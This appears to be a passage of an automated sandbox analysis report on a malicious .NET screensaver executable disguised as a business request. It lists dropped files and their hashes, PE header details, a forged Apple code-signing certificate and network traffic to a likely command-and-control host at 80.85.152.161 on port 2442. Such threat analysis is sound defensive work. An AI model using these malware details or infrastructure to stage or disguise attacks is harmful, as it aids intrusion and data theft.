                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                                                                                                                                  MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                                                                                                                                  SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                                                                                                                                  SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                                                                                                                                  SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3008001, file counter 13, database pages 30, 1st free page 27, free pages 1, cookie 0x1e, schema 4, UTF-8, version-valid-for 13
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):122880
                                                                                                                                                  Entropy (8bit):1.4530338001328815
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:oNghQnzpCp7pfYcVlVRVHLNYhtn8pApNVuVvY:oNghQnzpCp7pfYcVlVRVHLNYhtn8pApr
                                                                                                                                                  MD5:9DEFC75D6086CCDBE05ED9EE2159CF84
                                                                                                                                                  SHA1:BCF6B1893581F2420564160F784E47E91946269A
                                                                                                                                                  SHA-256:04F89C6DE1CA272A5019395A923DEAE68D5F47641AD5623606E3D092BAA7245A
                                                                                                                                                  SHA-512:D92A772BF416D7BCF0FF3F940E3ECDC4B2130060E85C1EBBBFDD108F535B28F034E1FAD846812607548B02D7AD4DC2BCD11546822E38A6F60ED2D87EB7F5D686
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ .........................................................................-......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
                                                                                                                                                  File Type:SQLite 3.x database, user version 35, last written using SQLite version 3008001, page size 32768, writer version 2, read version 2, file counter 3, database pages 35, cookie 0x1d, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1146880
                                                                                                                                                  Entropy (8bit):0.15644146423012004
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:CdEcZ6zssdySB+exixS4fS4QS4NS4ibRqwxeKlZfTOmPp80WOpp:+EccZdD3yJnbkw0KlAo5H
                                                                                                                                                  MD5:E28514A583D6F83F8C67CA62CB891CA7
                                                                                                                                                  SHA1:4107934697F0891B26B16A6E0D9795271353355C
                                                                                                                                                  SHA-256:B41E251C18B2B1CDD79E33F0B3AB12EAD8EF257969E26BFBB06DB7C70E9E0FFC
                                                                                                                                                  SHA-512:BF83CD24FEA896D38F07EA61FA639FCE7CC637AB97C6DFE5A6502772DECC4835160F5F49442266024B6564947B0AFB72901A8B1C848AF00808F0A3E08B740E4E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ .......#...............................#.................................-...}.."l..~\}.|.}M{.|az.y.zdyqx.y8w.xJviu.t.tNs.sxs.r.r.q.p.pwp.o.n.nym.mRl.l.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Users\user\AppData\Roaming\Kbojz.exe
                                                                                                                                                  File Type:Berkeley DB 1.85 (Hash, version 2, native byte-order)
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):16384
                                                                                                                                                  Entropy (8bit):1.121508608738599
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:Lt/hV/plfltt/lE9lllnldlHGltdl/l8/V0V6H/qSkBgRzc/e42jtgwS0dB7EWWD:5X9cvVmXy/VXXRYmFZtB7E0MH0cLD
                                                                                                                                                  MD5:1DEFC9C4F8AFC884D5714DE065F88E3D
                                                                                                                                                  SHA1:AE6ABD61EB9592F3804B80A0F4C4214AB2D85102
                                                                                                                                                  SHA-256:6F30E3E5BC88098596885E89B129B847646BBE16B7537FB2A0D876AA8515BF02
                                                                                                                                                  SHA-512:B1E4A625E6C3E24BDF5519C9D791E8C97E56381CF8882C4EC861CFC67F09811CED782E2CF51A0D55E434BF5EB5ACC2AA4DB0E7FBF1A7A3D06B5A3E0676360C54
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:...a.............................................................n}.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3008001, file counter 24, database pages 5, cookie 0xf, schema 4, UTF-8, version-valid-for 24
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):20480
                                                                                                                                                  Entropy (8bit):1.3870145383915669
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:TBLOpEO5J/Kd7UEvqckQaKgj5EZwx1wayEgd7kKK9LeYyBlIAO/tXK:hNw0CKaKfu1wai6LeYzN/9K
                                                                                                                                                  MD5:1623709C6B2FB813984B1265C26A85F1
                                                                                                                                                  SHA1:CCE4DDBE93E97E68359CB6FD71242F796A785F86
                                                                                                                                                  SHA-256:88BCF762A75F085ECD3B12EB2BA81B81A7F8C9CDDDD4DED624BA28566EB7EEAA
                                                                                                                                                  SHA-512:6D2E23E4E0D1D912AF3426129F7DE490F23326F6179EEC27AFE28C438CA37493AEA775E62755C76D6A8850DB6D6E70F0D0A8D396A35E869F4BF0F761CDD507D8
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ .........................................................................-........#..k...#.<....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):77824
                                                                                                                                                  Entropy (8bit):1.133993246026424
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                                                                                                                                  MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                                                                                                                                  SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                                                                                                                                  SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                                                                                                                                  SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
                                                                                                                                                  File Type:Berkeley DB 1.85 (Hash, version 2, native byte-order)
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):16384
                                                                                                                                                  Entropy (8bit):1.121508608738599
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:Lt/hV/plfltt/lE9lllnldlHGltdl/l8/V0V6H/qSkBgRzc/e42jtgwS0dB7EWWD:5X9cvVmXy/VXXRYmFZtB7E0MH0cLD
                                                                                                                                                  MD5:1DEFC9C4F8AFC884D5714DE065F88E3D
                                                                                                                                                  SHA1:AE6ABD61EB9592F3804B80A0F4C4214AB2D85102
                                                                                                                                                  SHA-256:6F30E3E5BC88098596885E89B129B847646BBE16B7537FB2A0D876AA8515BF02
                                                                                                                                                  SHA-512:B1E4A625E6C3E24BDF5519C9D791E8C97E56381CF8882C4EC861CFC67F09811CED782E2CF51A0D55E434BF5EB5ACC2AA4DB0E7FBF1A7A3D06B5A3E0676360C54
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:...a.............................................................n}.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):37688
                                                                                                                                                  Entropy (8bit):5.858227307628902
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:768:vCKxo5dcWZb35LhlEDSUOxpsFG+NU3hDf:zo5d9Zb35LhlEDSUOXsFG+W3hDf
                                                                                                                                                  MD5:F99DC4D2E045AE0BBC169FFF12A5C6D5
                                                                                                                                                  SHA1:C3A4A89907201776E9AD38FC63573522E0D233F1
                                                                                                                                                  SHA-256:E4726C4CAD6DD043E87289A51733A6627B2ABF1AE88B70458C9674EF4669540C
                                                                                                                                                  SHA-512:8DB711C745807AFD34DB67B2098229C53DA9E884A63D9322D016351DAB3CAD4D7B283CC43335EF924BA74DF44667BF6DC82E04A71396B64D92B64AC4BBF2E8EB
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 64%
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...}..f.....................J.......2... ...@....@.. ....................................`.................................T2..L....@..gG...........`..83...........................................................2............... ..H............text........ ...................... ..`.rsrc...gG...@...H..................@..@.reloc...............^..............@..B................H........$..6............................................................0..........(....%(...+.(...+...(....(......(....(................>.......?R.....?)......?!.....=.......(....85......(....8(......=........(....8......(....8......X..X(....*........0..(...........8......]:......X.8......Y...X...2..*........;.......;....8......Z.[*..X.Z*..Y.Z*.~....%:....&~..........s....%......o....*...0..>.......s....% ......s....o....% .......s....o....% .......s....o....*.......s.........*..(.
                                                                                                                                                  Process:C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                  Category:modified
                                                                                                                                                  Size (bytes):26
                                                                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                  Entropy (8bit):5.858227307628902
                                                                                                                                                  TrID:
                                                                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                  File name:UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
                                                                                                                                                  File size:37'688 bytes
                                                                                                                                                  MD5:f99dc4d2e045ae0bbc169fff12a5c6d5
                                                                                                                                                  SHA1:c3a4a89907201776e9ad38fc63573522e0d233f1
                                                                                                                                                  SHA256:e4726c4cad6dd043e87289a51733a6627b2abf1ae88b70458c9674ef4669540c
                                                                                                                                                  SHA512:8db711c745807afd34db67b2098229c53da9e884a63d9322d016351dab3cad4d7b283cc43335ef924ba74df44667bf6dc82e04a71396b64d92b64ac4bbf2e8eb
                                                                                                                                                  SSDEEP:768:vCKxo5dcWZb35LhlEDSUOxpsFG+NU3hDf:zo5d9Zb35LhlEDSUOXsFG+W3hDf
                                                                                                                                                  TLSH:EE039EC5DA342DD2F5F38D7C519D9A3A48EFB28CF6868A5B1058608D0A83FC32E155DD
                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...}..f.....................J.......2... ...@....@.. ....................................`................................
                                                                                                                                                  Icon Hash:126d6c6ce8335228
                                                                                                                                                  Entrypoint:0x4032a2
                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                  Digitally signed:true
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                  Time Stamp:0x661D987D [Mon Apr 15 21:13:33 2024 UTC]
                                                                                                                                                  TLS Callbacks:
                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                  OS Version Major:4
                                                                                                                                                  OS Version Minor:0
                                                                                                                                                  File Version Major:4
                                                                                                                                                  File Version Minor:0
                                                                                                                                                  Subsystem Version Major:4
                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                  Signature Valid:false
                                                                                                                                                  Signature Issuer:CN=Symantec Class 3 SHA256 Code Signing CA, OU=Symantec Trust Network, O=Symantec Corporation, C=US
                                                                                                                                                  Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                  Error Number:-2146869232
                                                                                                                                                  Not Before, Not After
                                                                                                                                                  • 2/6/2020 1:00:00 AM 3/2/2022 12:59:59 AM
                                                                                                                                                  Subject Chain
                                                                                                                                                  • CN=Apple Inc., O=Apple Inc., L=Cupertino, S=California, C=US
                                                                                                                                                  Version:3
                                                                                                                                                  Thumbprint MD5:809816AE499D0D27A8A2D75BD4B983E3
                                                                                                                                                  Thumbprint SHA-1:634A0D892E72161714861C178015AFE9C1832E14
                                                                                                                                                  Thumbprint SHA-256:46CD03A1949C4452B35CCBCEBF84B13C63807D70ACDB61C19D109729254F372F
                                                                                                                                                  Serial:4EF16586A2FF12D69C556EC4C91BAEE1
                                                                                                                                                  Instruction
                                                                                                                                                  jmp dword ptr [004032B0h]
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  test byte ptr [edx], dh
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x32540x4c.text
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x4767.rsrc
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x60000x3338
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xa0000xc.reloc
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x32b00x8.text
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                  .text0x20000x12b80x14009aa05276129f7bd54f69f3d046cd316dFalse0.5373046875data5.2598298064109175IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                  .rsrc0x40000x47670x480018f86383f21a07bd35957271b50b233cFalse0.1713324652777778data3.8690914056220507IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                  .reloc0xa0000xc0x2009da5c5c92091c67652731a1cc0eb4f46False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                  RT_ICON0x41600x468Device independent bitmap graphic, 16 x 32 x 32, image size 10240.16489361702127658
                                                                                                                                                  RT_ICON0x45d80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.08302063789868667
                                                                                                                                                  RT_ICON0x56900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 92160.05259336099585062
                                                                                                                                                  RT_ICON0x7c480x58bPNG image data, 256 x 256, 8-bit colormap, non-interlaced0.9859055673009162
                                                                                                                                                  RT_GROUP_ICON0x81e30x3edata0.7903225806451613
                                                                                                                                                  RT_VERSION0x82310x33cdata0.4335748792270531
                                                                                                                                                  RT_MANIFEST0x857d0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                                                                                  DLLImport
                                                                                                                                                  mscoree.dll_CorExeMain
                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Apr 19, 2024 16:16:43.509197950 CEST49171443192.168.2.2213.107.137.11
                                                                                                                                                  Apr 19, 2024 16:16:43.509253025 CEST4434917113.107.137.11192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:16:43.509325027 CEST49171443192.168.2.2213.107.137.11
                                                                                                                                                  Apr 19, 2024 16:16:43.540064096 CEST49171443192.168.2.2213.107.137.11
                                                                                                                                                  Apr 19, 2024 16:16:43.540153980 CEST4434917113.107.137.11192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:16:43.909827948 CEST4434917113.107.137.11192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:16:43.909920931 CEST49171443192.168.2.2213.107.137.11
                                                                                                                                                  Apr 19, 2024 16:16:43.915847063 CEST49171443192.168.2.2213.107.137.11
                                                                                                                                                  Apr 19, 2024 16:16:43.915859938 CEST4434917113.107.137.11192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:16:43.916332006 CEST4434917113.107.137.11192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:16:44.006552935 CEST49171443192.168.2.2213.107.137.11
                                                                                                                                                  Apr 19, 2024 16:16:44.052109003 CEST4434917113.107.137.11192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:16:44.807828903 CEST4434917113.107.137.11192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:16:44.807954073 CEST4434917113.107.137.11192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:16:44.812074900 CEST49171443192.168.2.2213.107.137.11
                                                                                                                                                  Apr 19, 2024 16:16:44.815817118 CEST49171443192.168.2.2213.107.137.11
                                                                                                                                                  Apr 19, 2024 16:16:46.735626936 CEST49172443192.168.2.2213.107.137.11
                                                                                                                                                  Apr 19, 2024 16:16:46.735717058 CEST4434917213.107.137.11192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:16:46.735800028 CEST49172443192.168.2.2213.107.137.11
                                                                                                                                                  Apr 19, 2024 16:16:46.736366987 CEST49172443192.168.2.2213.107.137.11
                                                                                                                                                  Apr 19, 2024 16:16:46.736403942 CEST4434917213.107.137.11192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:16:47.098617077 CEST4434917213.107.137.11192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:16:47.106223106 CEST49172443192.168.2.2213.107.137.11
                                                                                                                                                  Apr 19, 2024 16:16:47.106259108 CEST4434917213.107.137.11192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:16:47.729304075 CEST4434917213.107.137.11192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:16:47.729407072 CEST4434917213.107.137.11192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:16:47.730151892 CEST49172443192.168.2.2213.107.137.11
                                                                                                                                                  Apr 19, 2024 16:16:47.731913090 CEST49172443192.168.2.2213.107.137.11
                                                                                                                                                  Apr 19, 2024 16:16:52.609302044 CEST491742442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:16:52.855658054 CEST24424917480.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:16:52.855768919 CEST491742442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:16:57.875909090 CEST491742442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:16:58.178829908 CEST24424917480.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:16:58.178911924 CEST491742442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:16:58.443887949 CEST24424917480.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:16:58.444037914 CEST24424917480.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:16:58.444051981 CEST24424917480.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:16:58.444111109 CEST491742442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:16:58.444132090 CEST24424917480.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:16:58.655185938 CEST491742442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:16:58.690610886 CEST24424917480.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:16:58.690660954 CEST24424917480.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:16:58.690720081 CEST24424917480.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:16:58.690725088 CEST491742442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:16:58.690758944 CEST24424917480.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:16:58.690798044 CEST24424917480.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:16:58.690812111 CEST491742442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:16:58.901668072 CEST24424917480.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:16:58.901688099 CEST24424917480.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:16:58.901725054 CEST491742442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:16:58.937133074 CEST24424917480.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:16:58.937148094 CEST24424917480.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:16:58.937203884 CEST24424917480.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:16:58.937215090 CEST24424917480.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:16:58.937222958 CEST491742442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:16:58.937227011 CEST24424917480.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:16:58.937242985 CEST491742442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:16:58.937252998 CEST24424917480.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:16:58.937264919 CEST24424917480.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:16:58.937275887 CEST24424917480.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:16:58.937289000 CEST491742442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:16:59.138787031 CEST491742442192.168.2.2280.85.152.161
                                                                                                                                                  Apr 19, 2024 16:16:59.148921967 CEST24424917480.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:16:59.148941040 CEST24424917480.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:16:59.148952007 CEST24424917480.85.152.161192.168.2.22
                                                                                                                                                  Apr 19, 2024 16:16:59.149003029 CEST491742442192.168.2.2280.85.152.161
